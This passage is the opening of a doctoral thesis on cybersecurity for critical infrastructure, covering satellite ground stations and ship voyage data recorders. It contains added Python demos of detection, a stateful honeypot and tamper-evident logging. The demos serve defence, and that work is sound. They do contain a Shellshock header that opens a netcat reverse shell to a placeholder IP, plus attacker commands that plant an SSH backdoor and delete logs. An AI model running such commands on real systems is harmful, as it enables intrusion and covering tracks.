Mitigation and Incident Management Methodologies for Critical Infrastructure Protection

Università di Pisa

Doctoral Program in Information Engineering (Dottorato di Ricerca in Ingegneria dell'Informazione)

Mitigation and Incident Management Methodologies for Critical Infrastructure Protection

Doctoral Thesis

Author

Alessandro Cantelli-Forti

Tutors

Prof. Fabrizio Berizzi, Prof. Michele Colajanni, Dr. Amerigo Capria

Reviewers

Prof. Lorenzo Donatiello, Dr. Luca Allodi

The Coordinator of the PhD Program

Prof. Marco Luise

Pisa, April 2019 (XXXI cycle)


This thesis is dedicated to Gianna Dalle Mese. Gianna (Prof. Enzo Dalle Mese is her husband) nourished my palate and my mind with the delicious dishes and the most nutritious conversations of my life. Thank you.


"A Voyage data recording is that certainty produced at the point where the imperfections of memory meet the inadequacies of documentation" Patrick Lagrange


Acknowledgements


Undertaking the PhD has been a truly changing experience, both for my frame of reference and my objectives. Definitely, it would not have been possible without the support and guidance that I received from my tutors. Thus, my reference points of navigation in the field of research have been completely translated, like sailing from one hemisphere to the other of the same globe. Without the guidelines of Prof. Michele Colajanni, I would never have been able to introduce a change in perspective and to produce my first scientific contributions. I thank him for his patience, without which this new route would have led to a shipwreck. I would like to express my deep gratitude to Prof. Berizzi and Prof. Martorella for creating my working conditions and to Dr. Capria for bringing me home from the most dangerous adventures under the sea. Thank you very much to Dr. Ing. Stancari for her continuous support. The proposed research was partially funded by the following international grants:

1. X-WALD: “Avionic X-Band weather signal modelling and processing validation through real data acquisition and analysis”, EU-FP7-JTI agreement no 619236, 2014-2016

2. SCOUT: “Multitech Security System for interconnected space control ground station”, EU-FP7 agreement no 607019, 2014-2018

3. NATO AFSC-SSS-IA: “Implementation of Alliance Future Surveillance (AFSC) and Control Small Scale Studies (SSS) on Information Assurance (IA)”, agreement STO-OCS(2018)0073, 2018-2019


Acknowledgements (Italian version)

Undertaking a PhD has been the experience that changed me profoundly, both in my points of reference and in my objectives. Without doubt I could not have completed it without the support and guidance of my tutors. This is so true that all my reference points, and the very meaning of doing Research, have shifted, as if I had travelled from one hemisphere to the other. Without the guidance of Prof. Michele Colajanni I would never have been able to begin a change of perspective in order to produce clear contributions. I therefore thank him for his patience, without which the new course would have led me only onto the rocks, and I hope this is only the beginning. I also express all my gratitude to the Directors, Prof. Martorella and Prof. Berizzi, for having built and maintained the RaSS Laboratory. I thank Dr. Capria for always bringing me back from all the most dangerous adventures. Finally, thanks to Dr. Ing. Stancari for her constant support and patience. My work was partially funded by the international research projects listed above.


Summary

The research in the systems field of developing innovative cybersecurity techniques for the protection of critical infrastructures covers the methodologies for the protection of critical infrastructures, which must pursue various objectives in three main phases: Prevention, Detection, and Reaction. In particular, this thesis describes the study, design and implementation of solutions for the Detection and Reaction phases of Critical Infrastructure Protection, with a special focus on the Mitigation and Incident Management methodologies of reaction. Nowadays, the protection of a critical infrastructure must cover both the physical and the cyber realm. We propose novel solutions for the latter, while taking into account the necessary interactions between the two.

After an introduction to and definition of critical infrastructure, the research is introduced by a critical analysis of the state of the art and proposes new models for the integration of existing technologies under the conditions resulting from the intrinsically distributed and heterogeneous nature of most critical infrastructures. The tools initially described as a reference are the basis used to bring the reasoning towards the experimental context and then to the innovations proposed in the detection, prevention and reaction phases.

Subsequently, the Detection issues are presented through anomaly detection solutions applied to an Intrusion Detection System (IDS) supported by a novel network architecture. This architecture is based on the Software Defined Network (SDN) paradigm and was tested in a real critical infrastructure, a ground station for satellite communications. During the practical experimentation and the implementation of the prototypes, limitations and trade-offs related to the application of cybersecurity technologies in critical infrastructures were highlighted.

Original solutions for the Mitigation phase are proposed as an innovative HoneyNet integrating a virtualized decoy-system and accurate fingerprinting of the attackers. Mitigation experiments were also conducted on the network of the same critical infrastructure, a ground station for satellite communications.

The observations resulting from the research on the Detection and Mitigation phases led to original solutions for accurate fingerprinting of the attackers by means of an innovative HoneyNet integrating a virtualized decoy-system. The idea is to force each attacker to interact with his own synthetic system, thus improving on existing solutions that are based on stateless representations of the decoy-system. Our approach enables a stateful honeypot able to recognize multiple intrusions by the same adversary.

Incident Management is one of the most important topics in critical infrastructure protection. The main research results in this field are focused on components of critical transport systems and have been published in papers, international technical reports, surveys, and relevant juridical reports. Serious structural problems of state-of-the-art forensic recording devices were evidenced by two case studies and led to the description of novel solutions that exploit cryptographic technologies.


Summary (Italian version)

Research in the systems field of developing innovative cybersecurity techniques for the protection of critical infrastructures covers the methodologies for protecting critical infrastructures, which must pursue various objectives in three main phases: Prevention, Detection and Reaction. In particular, this thesis describes the study, design and implementation of solutions for the Detection and Reaction phases in Critical Infrastructure Protection, with particular attention to Mitigation and Incident Management methods.

The research is introduced by a critical analysis of the state of the art and proposes new models for integrating existing technologies under the conditions arising from the intrinsically distributed and heterogeneous nature of most critical infrastructures. Today the protection of a critical infrastructure must cover both the physical and the virtual environment. Innovative solutions will be proposed for the latter, while considering their mutual interactions. The tools initially described as a reference will be the building blocks used to guide the reader towards the experimental context and then towards the proposed innovations.

Detection problems are presented through anomaly detection solutions applied to an Intrusion Detection System (IDS) supported by a new network system architecture. This architecture is based on the Software Defined Network (SDN) paradigm and was tested in a real critical infrastructure, a ground station for satellite communications. During the practical experimentation and the implementation of the prototypes, limitations and trade-offs relating to the application of cybersecurity technologies in critical infrastructures were highlighted. Original solutions for the mitigation phases are presented as an innovative HoneyNet that integrates a virtualized decoy-system with accurate fingerprinting of the attackers. The experimentation of the mitigation phase was also conducted on the network of the critical infrastructure, a ground station for satellite communications.

The observations produced by the research on the Detection and Mitigation phases led to original solutions for accurate fingerprinting of the adversaries by means of an innovative HoneyNet integrating a virtual decoy-system. The idea is to force each adversary to interact with his own fictitious system, thus improving on existing solutions based on stateless representations of the decoy-system. Our innovative approach proposes to enable a stateful honeypot able to recognize, at the same time, multiple intrusions by the same adversary.

Incident management is one of the most important topics in critical infrastructure protection. The main research results presented in this field are centred on some of the systems that make up the critical transport infrastructure and have been published in a journal, international technical reports and relevant legal expert reports. Serious structural problems of data recording devices were highlighted by two case studies and led to the description of some new solutions that exploit cryptographic technologies.


List of publications

International Journals and Book Chapters

1. A. Cantelli-Forti, M. Colajanni, “Information security in critical transport systems: Case studies and lessons learned”, Journal of Cybersecurity, Nov 2018.

2. L. Fiorentini, L. Marmo and A. Cantelli-Forti, “Fire on board of a ferryboat”, book chapter in Principles of Forensic Engineering Applied to Industrial Accidents, pp. 280-296, ISBN: 978-1-118-96280-0, Wiley, Jan 2019.

International Conferences and Workshops with Peer Review

1. A. Cantelli-Forti, M. Colajanni, “Adversarial fingerprinting based on stateful honeypots”, IEEE Computer Society’s CPS proceedings of The 2018 International Conference on Computational Science and Computational Intelligence (CSCI’18), 13-15 Dec 2018.

2. A. Cantelli-Forti, “Forensic Analysis of Industrial Critical Systems: The Costa Concordia’s Voyage Data Recorder Case”, Proc. of 2018 IEEE International Conference on Smart Computing (SMARTCOMP), pp. 458-463, 18-20 June 2018.

3. C. Callegari, A. Cantelli Forti, G. D’Amore, E. De La Hoz, D. Echarri, I. García-Ferreira, G. López-Civera, “An architecture for securing communications in critical infrastructure”, Proc. of the 13th International Joint Conference on e-Business and Telecommunications, pp. 111-120, 2016.

4. A. Capria, C. Moscardini, M. Conti, A. Cantelli Forti, F. Berizzi et al., “Passive radar research activity at Lab RaSS-CNIT”, presented at the IEEE South Australia Workshop on Passive Radar, Adelaide, Australia, 23-24 November 2015.

5. A. Capria, D. Petri, C. Moscardini, M. Conti, A. Cantelli-Forti et al., “Software-defined Multiband Array Passive Radar (SMARP) demonstrator: A test and evaluation perspective”, Proc. of OCEANS 2015, Genoa, 18-21 May 2015, pp. 1-6.


National Conference

1. B. Chiaia, R. Sicari, A. Cantelli-Forti et al., “Incendio della Motonave Norman Atlantic: Indagini Multidisciplinari in Incidente Probatorio” (Fire on the motor vessel Norman Atlantic: multidisciplinary investigations in pre-trial evidentiary proceedings), IF CRASC Conference on Forensic Engineering, Politecnico di Milano, 14-16 September 2017.

International Technical Reports

1. C. Callegari, M. Martorella, A. Cantelli-Forti et al., NATO STO Technical Report “SSS on Information Assurance (IA)”, August 2018

2. F. Berizzi, C. Callegari, A. Cantelli-Forti et al., “CYBERSENS SUBSYSTEMS”, SCOUT Project technical report, October 2017

3. F. Berizzi, A. Cantelli-Forti, C. Callegari et al., “Test Planning and Experimental Set-up”, SCOUT Project technical report, November 2017

4. F. Berizzi, A. Cantelli-Forti, C. Callegari et al., “SCOUT DEMONSTRATOR”, SCOUT Project technical report, November 2017

5. F. Berizzi, A. Cantelli-Forti, C. Callegari et al., “Results on data analysis and system validation”, SCOUT Project technical report, April 2018

6. C. Callegari, A. Cantelli Forti, I. Marsá Maestre, G. López Civera, D. Echarri, I. García-Ferreira, “Preliminary Results on Cybersens Subsystem, final version”, SCOUT Project technical report, October 2016

7. F. Berizzi et al., “Demonstrator scenario, requirements and architecture”, SCOUT Project technical report, October 2016

8. D. Adami et al., “Operative and system requirements with scenario definition”, Multitech SeCurity system for intercOnnected space control groUnd staTions (SCOUT) Project technical report, June 2016

9. M. Rosa Zurera et al., “Risk analysis preliminary results”, SCOUT Project technical report, June 2016

10. D. Adami et al., “SCOUT system architecture”, SCOUT Project technical report, June 2016

11. C. Callegari, A. Cantelli Forti, I. Marsá Maestre, G. López Civera, D. Echarri, I. García-Ferreira, “Preliminary Results on Cybersens Subsystem”, SCOUT Project technical report, June 2016


International Workshops

1. A. Cantelli Forti, “Ship’s digital evidences as an open format data logger of a network of sensors”, lecture at the Electronic and Technical Evidence Seminar, Marine Accident Investigation Branch (UK Government Agency), Southampton, 25-27 July 2017.

2. A. Cantelli Forti, “Evidence recovery and analysis from the Costa Concordia’s digital data by means of forensic techniques: turn data into information”, guest speaker at the European Maritime Safety Agency (EMSA) Seminar on Voyage Data Recorders and Electronic Evidence, Cranfield University, January 2016.

3. A. Cantelli Forti, “The importance of Open Format for storing digital data asynchronously generated from multiple sensors”, speaker at the European Marine Accident Investigators’ International Forum (EMAIIF), April 2016.


Contents

1 Introduction

2 Background, Motivation and Requirements
2.1 Background
2.2 Motivation
2.2.1 Modeling and Simulation methodological approaches
2.3 Cyber Security Pillars
2.3.1 Confidentiality
2.3.2 Authenticity and Integrity
2.3.3 Availability
2.3.4 Non-Repudiation
2.4 Critical Infrastructure reference architecture
2.4.1 Reference Architecture assumptions
2.4.2 Analysis of the architecture and its requirements
2.4.3 Threats, Vulnerabilities and Risks
2.5 Communication Links Requirements
2.5.1 Confidentiality
2.5.2 Authenticity and Integrity
2.5.3 Availability
2.5.4 Non-Repudiation
2.6 Physical Security Requirements of Cryptographic Units
2.7 Information Assurance Functional Requirements
2.7.1 Confidentiality, integrity, and authenticity
2.7.2 Availability
2.7.3 Non-repudiation
2.8 Information Assurance Non-Functional Requirements
2.8.1 Confidentiality
2.8.2 Availability

3 Detection phase
3.1 Space Control Ground Stations architecture for Detection phase
3.2 Detection phase required functionality
3.3 Proposed architecture of the Detection sub-system
3.4 Anomaly Detection subsystem
3.5 Misuse-based detection subsystem
3.6 Detection system evaluation benchmarks
3.7 Experimental Evaluation
3.7.1 Detection Phase Demonstrator
3.8 Detection phase conclusions

4 Mitigation phase
4.1 Space control ground stations architecture for Mitigation phase
4.2 Mitigation phase required functionality
4.3 Proposed architecture of the Mitigation sub-system
4.4 Mitigation system evaluation benchmarks
4.5 Experimental Evaluation
4.5.1 Mitigation phase demonstrator
4.6 Detection and Mitigation phases conclusions
4.7 Slowing down attackers with Adversarial Fingerprinting
4.7.1 Motivation
4.7.2 Adopted technologies
4.7.3 Next generation file system
4.7.4 Lightweight virtualization
4.7.5 Experimental environment
4.7.6 Recovery and intelligent reconfiguration
4.7.7 Stateful Honeypots: final considerations

5 Incident Management phase
5.1 Information security in critical transport systems
5.1.1 Data recording requirements
5.1.2 Event Data Recorders
5.2 Literature Review
5.3 Voyage Data Recorders’ operations and current limitations
5.3.1 Voyage Data Recorder’s data sources
5.3.2 The NMEA data format
5.3.3 Assemblage of subsystems
5.3.4 Data sentences fragmentation
5.3.5 Clock synchronization
5.3.6 Push and Pull architectures
5.4 Lessons Learned
5.5 Proposed Solutions
5.5.1 Understanding and exploitation of data
5.5.2 Data Integrity and Availability
5.5.3 Forensically sound procedures
5.6 Case Study: Forensic Analysis of Transportation Critical System
5.6.2 The Legal context
5.6.3 Challenges and Motivations
5.6.4 Data Sources
5.6.5 Regulations concerning the Voyage Data Recorders
5.6.6 Voyage Data Recorder System Architecture
5.6.7 Data Acquisition
5.6.8 Law Enforcement Forensic Operations
5.6.9 Turning Data into Information
5.6.10 The NMEA standard
5.6.11 Lesson Learned from Case Study

6 Conclusions


Chapter 1

Introduction

As used by governments, the term Critical Infrastructure refers to assets that are essential for the functioning of a society and its economy. Critical Infrastructures provide the essential services that support societies and serve as the backbone of the economy, security and health, as they guarantee the most important needs we rely on, such as power, water, communication and transportation systems [54]. Under this definition, not only nuclear power plants or ministries but also universities and large cruise ships carrying thousands of people are critical infrastructures. Critical Infrastructure Protection is therefore a concept that relates to preparedness for, and response to, serious incidents. This doctoral thesis both describes some state-of-the-art techniques for defending Critical Infrastructures and proposes innovative solutions in the field of cybersecurity [18] and its integration with physical protection [13]. In particular, the research focuses on critical transport and telecommunication infrastructures and includes participation in case studies and experiments on real, operational systems.

The systems field of developing innovative cybersecurity techniques for the protection of critical infrastructures includes multistage methodologies grouped in three main phases: Prevention, Detection, and Reaction (Fig. 1.1). This research tackles the study, design and implementation of cybersecurity solutions for the Detection and Reaction phases, with a special focus on Mitigation and Incident Management reaction methodologies.

The research starts from a critical analysis of the state of the art: the fundamental principles of cybersecurity are presented in an introductory description built around a picture of an ideal Critical Infrastructure. A representation of a hypothetical Surveillance and Control communication architecture is provided, together with the associated threats and vulnerabilities. Consequently, a list of functional and non-functional requirements is drawn up, and for each of them appropriate procedures and technical security measures are indicated. The proposed actions take into account both current threats and future cybersecurity challenges and pave the way for the next phases of the research described in Chapters III and IV.

Figure 1.1: Prevention, Detection and Reaction phases.

The Detection phase is addressed through anomaly detection techniques applied to an Intrusion Detection System (IDS) exploiting a novel network architecture based on the Software Defined Network (SDN) paradigm. The proposed architecture was tested and validated in a real critical infrastructure, a satellite communications ground station [13]. Early detection and localization of cyber attacks is carried out by combining signature-based techniques, effective in detecting well-known attacks, with anomaly-based techniques, effective also in detecting novel (e.g., zero-day) attacks. During the practical experimentation and the implementation of the prototypes, some technological limits related to the implementation of cybersecurity in critical infrastructures emerged as a trade-off between functionality and security. A prime example: the confidentiality ensured by encrypting the links hides the payload from a signature-based IDS, which can no longer match its patterns against the traffic unless the sensor is given access to the plaintext.
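The trade-off described in the preceding paragraph can be made concrete with the following added example (it is not code from the thesis or the SCOUT project). A misuse-based matcher looks for known byte patterns in the payload; once the same request is carried on an encrypted link, the patterns are no longer visible, while an anomaly detector working on metadata that survives encryption (bytes per interval per host, scored as a z-score against a learned baseline) still fires on an exfiltration burst. The signatures, the flow records and the keystream used as a stand-in for TLS ciphertext are all constructed for the example.

```python
"""Signature vs. anomaly detection on the same traffic, in clear and encrypted.

Added illustration, not code from the thesis. Payload signatures, flow
volumes and the pseudo-ciphertext keystream are constructed for the demo.
"""
import hashlib
import math
import statistics

# Constructed byte patterns a misuse-based IDS would carry as rules.
SIGNATURES = {
    "shellshock": b"() { :;};",
    "sqli_union": b"UNION SELECT",
}


def signature_match(payload: bytes) -> list:
    """Misuse-based detection: names of the known patterns found in the payload."""
    return [name for name, pat in SIGNATURES.items() if pat in payload]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: protocol text sits around 4-5, ciphertext close to 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pseudo_encrypt(plaintext: bytes, key: bytes = b"demo-key") -> bytes:
    """Deterministic keystream XOR standing in for the opaque payload an IDS sees
    on a TLS link. Not a real cipher; it only reproduces ciphertext's opacity."""
    out = bytearray()
    for i in range(0, len(plaintext), 32):
        block = hashlib.sha256(key + i.to_bytes(4, "big")).digest()
        out.extend(p ^ k for p, k in zip(plaintext[i:i + 32], block))
    return bytes(out)


class VolumeBaseline:
    """Anomaly detection on metadata that survives encryption: bytes per interval
    per host, scored as a z-score against a baseline learned from clean traffic."""

    def __init__(self, threshold: float = 3.0):
        self.threshold = threshold
        self.stats = {}

    def train(self, samples: dict):
        for host, volumes in samples.items():
            self.stats[host] = (statistics.fmean(volumes), statistics.pstdev(volumes))

    def zscore(self, host: str, volume: int) -> float:
        if host not in self.stats:
            return math.inf            # never-seen host: alert rather than stay silent
        mean, stdev = self.stats[host]
        if stdev == 0:                 # constant baseline: any deviation is anomalous
            return 0.0 if volume == mean else math.inf
        return (volume - mean) / stdev

    def is_anomalous(self, host: str, volume: int) -> bool:
        return abs(self.zscore(host, volume)) > self.threshold


def demo() -> dict:
    # Constructed HTTP request carrying a Shellshock-style payload in a header.
    request = (b"GET /cgi-bin/status HTTP/1.1\r\n"
               b"Host: groundstation.example\r\n"
               b"User-Agent: () { :;}; /bin/nc -e /bin/sh 198.51.100.9 4444\r\n"
               b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
               b"Accept-Language: en-US,en;q=0.5\r\n"
               b"Accept-Encoding: gzip, deflate\r\n"
               b"Cookie: session=3f9c2a1e8b7d4c6f; telemetry=enabled\r\n"
               b"Connection: keep-alive\r\n\r\n")
    encrypted = pseudo_encrypt(request)

    baseline = VolumeBaseline()
    baseline.train({"10.0.0.5": [1200, 1100, 1300, 1250, 1180]})  # constructed clean intervals
    return {
        "clear_signature_hits": signature_match(request),
        "encrypted_signature_hits": signature_match(encrypted),
        "clear_entropy": round(shannon_entropy(request), 2),
        "encrypted_entropy": round(shannon_entropy(encrypted), 2),
        "normal_interval_flagged": baseline.is_anomalous("10.0.0.5", 1300),
        "exfil_interval_flagged": baseline.is_anomalous("10.0.0.5", 90_000),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The point is not that volume statistics replace signatures, but that the two subsystems see different things: the signature matcher needs plaintext (a TLS-terminating sensor or a decryption tap), whereas the anomaly subsystem keeps working on flow metadata even when the links are confidential.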

Original solutions for the Mitigation phase have also been tested in the same satellite communications infrastructure. Experiments were carried out on an innovative HoneyNet integrating a virtualized decoy-system [13] in a resilient and self-adaptive configuration. This configuration suggested a further step: using it for accurate fingerprinting of the attackers. The main objective is to lead each attacker to interact with a unique virtualized environment, extending the effectiveness of current solutions that are based on stateless representations of the decoy-system. Stateless decoys suffer from two drawbacks: i) they are easily identified by expert attackers; ii) they are unable to track the progress of specific intrusions carried out by the same attacker, especially in the large systems that support critical infrastructures. For these reasons, our approach proposes an innovative solution that enables a stateful honeypot to recognize multiple intrusions by the same adversary and to redirect each of them to the same synthetic decoy-system in the state left by the previous intrusion, including installed rootkits and backdoors, modifications of the file system, and so on. The research idea achieves the further benefits of slowing down the opponent's operations and fingerprinting his attack for subsequent enrichment of adversarial intelligence and attribution systems [18].
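The stateful behaviour described above (in this paragraph and in the Summary) can be shown in miniature with the following added example, which is not code from the thesis. It assumes that an adversary can be fingerprinted from pre-authentication connection metadata (source /24, SSH client banner, offered key-exchange list; the feature choice is an assumption, not the thesis's) and models a decoy as a dict standing in for a writable snapshot of a container's filesystem. A stateless honeynet hands every connection a pristine decoy; the stateful one resumes the decoy bound to the fingerprint, so the backdoor dropped in one session is still there when the same actor returns, while an unrelated actor lands on a clean system.

```python
"""Stateful decoy dispatcher: resume the same decoy for the same adversary.

Added illustration, not code from the thesis. Fingerprint features and the
dict-based decoy are assumptions; a real deployment would snapshot container
filesystems instead.
"""
import hashlib
from dataclasses import dataclass, field


@dataclass
class Connection:
    src_ip: str
    client_banner: str   # e.g. "SSH-2.0-OpenSSH_8.9"
    kex_algos: tuple     # key-exchange algorithms in the order the client offers them
    commands: list       # constructed transcript: "write <path> <data>", "rm <path>", "ls <path>"


def fingerprint(conn: Connection) -> str:
    """Hash of features that stay stable across an adversary's reconnections:
    the /24 tolerates address churn inside one range, banner and KEX order
    identify the tooling."""
    net24 = ".".join(conn.src_ip.split(".")[:3])
    material = "|".join([net24, conn.client_banner, ",".join(conn.kex_algos)])
    return hashlib.sha256(material.encode()).hexdigest()[:16]


@dataclass
class Decoy:
    """A synthetic system: filesystem snapshot plus per-adversary history."""
    fs: dict = field(default_factory=lambda: {
        "/etc/passwd": "root:x:0:0:root:/root:/bin/sh\n",
        "/var/log/auth.log": "Accepted password for root from 10.0.0.9\n",
    })
    sessions: int = 0
    history: list = field(default_factory=list)


def run_session(decoy: Decoy, conn: Connection) -> Decoy:
    """Apply the attacker's commands to the decoy's filesystem and record them."""
    decoy.sessions += 1
    for cmd in conn.commands:
        decoy.history.append(cmd)
        parts = cmd.split(" ", 2)
        if len(parts) < 2:
            continue                            # bare commands (exit, id) touch nothing
        op, path = parts[0], parts[1]
        if op == "write":                       # drop a backdoor, edit a config ...
            decoy.fs[path] = parts[2] if len(parts) == 3 else ""
        elif op == "rm":                        # anti-forensics
            decoy.fs.pop(path, None)
    return decoy


class StatelessHoneynet:
    """Baseline: every connection lands on a pristine decoy."""

    def handle(self, conn: Connection) -> Decoy:
        return run_session(Decoy(), conn)


class StatefulHoneynet:
    """Proposed behaviour: the decoy bound to a fingerprint is resumed, not rebuilt."""

    def __init__(self, max_decoys: int = 1000):
        self.decoys = {}
        self.max_decoys = max_decoys

    def handle(self, conn: Connection) -> Decoy:
        fp = fingerprint(conn)
        decoy = self.decoys.get(fp)
        if decoy is None:
            if len(self.decoys) >= self.max_decoys:
                # capacity is finite: retire the least-revisited decoy
                victim = min(self.decoys, key=lambda k: self.decoys[k].sessions)
                del self.decoys[victim]
            decoy = self.decoys[fp] = Decoy()
        return run_session(decoy, conn)


def demo() -> dict:
    """Same tooling from a new address in the same /24: stateful resumes, stateless forgets."""
    kex = ("curve25519-sha256", "ecdh-sha2-nistp256")
    first = Connection("203.0.113.7", "SSH-2.0-OpenSSH_8.9", kex, [
        "write /root/.ssh/authorized_keys ssh-ed25519 AAAAC3Nz... attacker@c2",
        "rm /var/log/auth.log",
    ])
    returning = Connection("203.0.113.21", "SSH-2.0-OpenSSH_8.9", kex, ["ls /root/.ssh"])
    unrelated = Connection("198.51.100.5", "SSH-2.0-libssh_0.9.6",
                           ("diffie-hellman-group14-sha256",), ["ls /root/.ssh"])

    stateful = StatefulHoneynet()
    stateful.handle(first)
    resumed = stateful.handle(returning)
    fresh = stateful.handle(unrelated)

    stateless = StatelessHoneynet()
    stateless.handle(first)
    forgotten = stateless.handle(returning)

    return {
        "same_fingerprint": fingerprint(first) == fingerprint(returning),
        "stateful_backdoor_persists": "/root/.ssh/authorized_keys" in resumed.fs,
        "stateful_log_still_deleted": "/var/log/auth.log" not in resumed.fs,
        "stateful_sessions_for_actor": resumed.sessions,
        "unrelated_actor_isolated": "/root/.ssh/authorized_keys" not in fresh.fs,
        "stateless_backdoor_persists": "/root/.ssh/authorized_keys" in forgotten.fs,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The per-decoy history is what the fingerprinting and attribution step would consume: the sequence of actions across sessions belongs to one actor, not to one connection. The eviction rule is a placeholder for whatever retention policy the deployment needs; a retired decoy's snapshot should be archived, not discarded, if its history is to be used as evidence.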

Incident Management is considered one of the most important topics in Critical Infrastructure Protection. The main research in this phase is focused on critical transport systems and has been published in papers, international technical reports, surveys, and relevant juridical reports. More specifically, any critical infrastructure for transportation relies on safety-critical systems that have to meet stringent requirements. System performance and operations are continuously monitored by means of multiple sensors producing large amounts of data, and the relevant information is preserved in so-called event data recorders. Research on this topic [17, 19] highlights some present limitations in the exploitation of recorded data, which is fundamental for the legal reconstruction of the scenario in case of serious malfunctions and incidents. The study of this phase shows both the legal limits of current regulations and the technical limits of their applicability. Real examples are drawn from the investigations into the Costa Concordia and Norman Atlantic accidents and are compared with the results of accidents involving other means of transport in which Information Assurance was not preserved. Possible solutions are proposed to guarantee information security in terms of data integrity and availability, which are essential to identify and attribute human and/or machine responsibilities.

This thesis is organized as follows. Chapter II is motivational: it contains a detailed description of the terms and contexts of interest. Chapter III describes a novel, experimental implementation of Detection techniques, and Chapter IV defines the related Mitigation phase and the subsequent advances in research. Chapter V pertains to Incident Management, first highlighting the limits of current implementations and then proposing novel advances through various technology transfers. The last chapter draws up a reasoned list of lessons learned.
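The Summary and the paragraph above both say that recorded data must keep its integrity to be usable in a legal reconstruction, and that the proposed remedies use cryptographic technologies; the thesis's own design is not given on this page. The following added example (not the thesis's code) shows one way a recorder could do this for NMEA 0183 sentences, the format the Voyage Data Recorder chapter covers: each sentence is checked against the checksum it already carries (XOR of the characters between "$" and "*"), and every accepted record is then HMAC-authenticated and chained to the previous one, so that later alteration, deletion or reordering is detectable. The key, timestamps and sentences are constructed; in a real recorder the key would live in tamper-resistant hardware, not in the source.

```python
"""Tamper-evident recording of NMEA 0183 sentences.

Added illustration, not the thesis's own design. Key, timestamps and
sentences are constructed for the example.
"""
import hashlib
import hmac
import json

GENESIS = b"\x00" * 32


def nmea_checksum(body: str) -> str:
    """Two uppercase hex digits: XOR of all characters between '$' and '*'."""
    x = 0
    for ch in body:
        x ^= ord(ch)
    return f"{x:02X}"


def make_sentence(body: str) -> str:
    return f"${body}*{nmea_checksum(body)}"


def nmea_checksum_ok(sentence: str) -> bool:
    """Reject sentences without a '$'/'!' start or whose checksum disagrees."""
    if len(sentence) < 4 or sentence[0] not in "$!" or "*" not in sentence:
        return False
    body, _, given = sentence[1:].partition("*")
    return len(given) >= 2 and nmea_checksum(body) == given[:2].upper()


def _canonical(rec: dict) -> bytes:
    """Stable byte encoding of the authenticated fields."""
    fields = {k: rec[k] for k in ("seq", "ts", "nmea", "prev")}
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


class ChainedRecorder:
    """Append-only log: every record commits to the previous one and is MACed."""

    def __init__(self, key: bytes):
        self.key = key
        self.records = []
        self.rejected = []
        self.prev = GENESIS

    def append(self, ts: str, sentence: str) -> bool:
        if not nmea_checksum_ok(sentence):
            self.rejected.append((ts, sentence))      # keep evidence of bad input too
            return False
        rec = {"seq": len(self.records), "ts": ts, "nmea": sentence, "prev": self.prev.hex()}
        body = _canonical(rec)
        tag = hmac.new(self.key, body, hashlib.sha256).digest()
        rec["tag"] = tag.hex()
        self.records.append(rec)
        self.prev = hashlib.sha256(body + tag).digest()
        return True


def verify_chain(records: list, key: bytes) -> tuple:
    """(True, n) if all n records link and authenticate, else (False, index of first break)."""
    prev = GENESIS
    for i, rec in enumerate(records):
        if rec["seq"] != i or bytes.fromhex(rec["prev"]) != prev:
            return False, i                      # gap, reorder or deletion
        body = _canonical(rec)
        tag = bytes.fromhex(rec["tag"])
        if not hmac.compare_digest(hmac.new(key, body, hashlib.sha256).digest(), tag):
            return False, i                      # content changed after recording
        prev = hashlib.sha256(body + tag).digest()
    return True, len(records)


def demo() -> dict:
    key = b"constructed-recorder-key"           # assumption: provisioned out of band
    rec = ChainedRecorder(key)
    sentences = [
        make_sentence("GPRMC,123519,A,4807.038,N,01131.000,E,022.4,084.4,230394,003.1,W"),
        make_sentence("HEHDT,084.6,T"),
        make_sentence("GPVTG,084.4,T,081.3,M,022.4,N,041.5,K"),
    ]
    for i, s in enumerate(sentences):
        rec.append(f"2019-04-01T12:35:{19 + i:02d}Z", s)
    # a sentence corrupted on the serial line: last checksum digit changed
    corrupt = sentences[1][:-1] + ("0" if sentences[1][-1] != "0" else "1")
    rec.append("2019-04-01T12:35:22Z", corrupt)

    edited = [dict(r) for r in rec.records]
    edited[0]["nmea"] = edited[0]["nmea"].replace("022.4", "002.4")   # speed altered afterwards
    deleted = rec.records[:1] + rec.records[2:]                        # one record removed
    return {
        "accepted": len(rec.records),
        "rejected": len(rec.rejected),
        "intact": verify_chain(rec.records, key),
        "edited": verify_chain(edited, key),
        "deleted": verify_chain(deleted, key),
        "wrong_key": verify_chain(rec.records, b"other-key"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Two caveats a practitioner would add. An HMAC lets only holders of the key verify the chain; if investigators or courts must verify without trusting the operator, the per-record tag (or a periodic chain head) should be signed with an asymmetric key or anchored with a trusted timestamping service. And the chain proves integrity and order, not availability: a recorder destroyed in the casualty takes its log with it, so the chain heads still need to be replicated off the device.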


Chapter 2

Background, Motivation and Requirements

2.1 Background

Since the mid-1990s, dramatic experiences caused by natural or man-made disasters have made it an urgent matter to understand how dependent our society is on those infrastructures which, if disrupted or destroyed, would seriously compromise our quality of life and the overall functioning of society. Critical infrastructure protection has therefore become a general label for a range of activities undertaken jointly by governments and the operators of key locations, facilities and systems to ensure adequate risk management. In 1996 the USA was the first nation to put a wide-reaching critical infrastructure protection program in place. Its Patriot Act of 2001 defined critical infrastructure as those "systems and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters".

Protection of critical buildings, plants and infrastructure is one of the most important issues for the EU as well. The European Programme for Critical Infrastructure Protection (EPCIP) has been laid out in EU Directives by the Commission, which has proposed a list of European critical infrastructures based upon inputs by its member states. The Justice and Home Affairs (JHA) Council in June 2008 approved the text of the Directive on the identification and designation of European Critical Infrastructures and the assessment of the need to improve their protection (Directive 2008/114/EC). The approval of the Directive, whose proposal was presented by the Commission in December 2006 (Act COM(2006) 786), represents the final step of a normative path undertaken by the European Council of October 2004 in response to the Commission's request to prepare a global strategy for the protection of Critical Infrastructures (Act COM(2004) 702). The Directive lays out the measures established by the Commission in order to guarantee the correct operation of European Critical Infrastructures. In the European context, the definition of critical infrastructure can refer to the document "Critical Infrastructure Protection in the fight against terrorism - COM(2004) 702": critical infrastructures consist of those physical and information technology 